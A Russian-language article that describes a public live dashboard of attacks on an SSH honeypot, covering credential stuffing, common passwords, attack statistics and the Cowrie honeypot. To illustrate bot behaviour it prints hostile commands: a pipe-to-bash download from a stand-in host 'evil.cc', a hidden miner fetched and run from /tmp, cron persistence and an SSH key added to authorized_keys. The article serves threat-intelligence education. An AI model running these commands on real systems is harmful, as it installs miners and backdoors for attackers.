SSH-ловушка в реальном времени: смотри на ботов вживую
Сайт honeypotlive.cc показывает атаки на SSH-приманку в реальном времени — IP, пароли, команды ботов. Инструмент для обучения и threat intelligence.
Смотри, как боты ломятся в дверь
На платформе honeypotlive.cc запустили публичный дашборд, который показывает атаки на SSH-приманку в режиме реального времени. Дашборд отображает живую телеметрию SSH honeypot (ловушки-сервера, имитирующего настоящую систему) в целях исследования безопасности, сбора threat intelligence и обучения. Любой желающий может открыть сайт и буквально наблюдать, как автоматические боты пытаются взломать сервер прямо сейчас.
Что именно показывает дашборд
На дашборде видны IP-адреса источников, имена пользователей, пароли, команды, клиентские fingerprint-ы и метаданные входящих подключений. При этом IP-адрес может принадлежать скомпрометированному хосту, прокси, VPN, сканеру, облачному инстансу или узлу ботнета — и не обязательно указывает на реального злоумышленника.
Данные могут включать команды, введённые атакующими, учётные данные, URL, публичные ключи, попытки доставки вредоносного ПО и другой недоверенный контент.
Как выглядит типичная атака
Поток атак на SSH — не случайные одиночки, а хорошо отлаженные автоматы. SSH остаётся самым атакуемым протоколом: большинство атак — это автоматизированные боты credential stuffing, перебирающие стандартные комбинации логин/пароль. Топ встречаемых пар — root:root, admin:admin, root:123456 — предсказуемы, но встречаются и целевые словари под конкретные платформы и облачных провайдеров.
80% соединений используют SSH-клиенты на Go. Это не люди, вручную набирающие ssh root@yourserver — это автоматизированные инструменты и кастомные сканеры, созданные для массового перебора учётных данных.
sequenceDiagram
participant Bot as 🤖 Бот
participant HP as 🍯 Honeypot (SSH)
participant DB as 📊 Дашборд
Bot->>HP: Подключение (порт 22)
HP->>Bot: Принять соединение
Bot->>HP: root:123456 / admin:admin
HP->>DB: Записать IP, пароль, fingerprint
Bot->>HP: curl http://evil.cc/miner.sh | bash
HP->>DB: Записать команду, URL, payload
HP-->>Bot: Симулировать среду
Что делают боты после «входа»
После аутентификации атакующие, как правило, следуют стандартному сценарию: загружают криптомайнер или агент ботнета через curl или wget, закрепляются через cron-задачи и пытаются горизонтально распространиться, сканируя внутренние сети.
Атакующие, успешно залогинившиеся в SSH-ловушку, скачивали вредоносное ПО: IRC-боты, Mirai, XMRig-криптомайнеры и другие.
# Типичные команды, которые боты выполняют после входа
curl -fsSL http://[c2-server]/install.sh | bash
wget -q http://[c2-server]/miner -O /tmp/.x && chmod +x /tmp/.x && /tmp/.x
crontab -e # добавить персистентность
ssh-keygen && cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
Масштаб угрозы в цифрах
| Показатель | Данные |
|---|---|
| SSH-попыток за период наблюдения | 12 224+ подключений |
| Соотношение провальных / успешных входов | 4,6 : 1 |
| Доля Go-based клиентов среди атакующих | ~80% |
| Самые частые пароли | 123456, admin, root, password |
| Типы малвари после входа | Mirai, XMRig, IRC-боты, бэкдоры |
Исследования фиксируют более 12 000 SSH-попыток подключения за один период наблюдения, с пиками активности, вероятно связанными с деятельностью ботнетов или плановыми кампаниями сканирования. Высокий объём демонстрирует распространённость автоматической разведки и важность активного мониторинга.
Эволюция атак: боты умнеют
Простой перебор паролей — уже не единственная тактика. Исследования трёхлетнего хоннета фиксируют тренд к более «исследовательским» атакам: атакующие всё чаще выходят за рамки слепого выполнения скриптов. Новые боты применяют уникальные методы, а устоявшиеся ботнеты со временем меняют подходы. В последние месяцы атакующие перешли к тактике предварительной разведки, проявляя возросшую адаптивность.
Ценность honeypot — не только в детектировании атак, но и в понимании поведения атакующих, что позволяет укрепить реальную инфраструктуру.
Популярные SSH-ловушки
Cowrie — давний, поддерживаемый сообществом SSH и Telnet honeypot, дающий защитникам глубокую видимость действий атакующих. Он возник как форк Kippo в 2014 году и вырос в авторитетный инструмент в сообществе threat intelligence. В отличие от low-interaction ловушек, Cowrie симулирует убедительную Linux-подобную оболочку с поддельной файловой системой, записывая каждую введённую команду.
Зачем это нужно отрасли
По мере того как киберугрозы продолжают эволюционировать, организации всё активнее используют продвинутые механизмы безопасности. Honeypot-ы как инструменты обмана играют ключевую роль в системах обнаружения вторжений, собирая разведывательные данные о тактиках атакующих.
Публичный дашборд вроде honeypotlive.cc делает этот процесс видимым для всех — от студентов до CISO. Смотреть на атаки в реальном времени куда нагляднее любого учебника.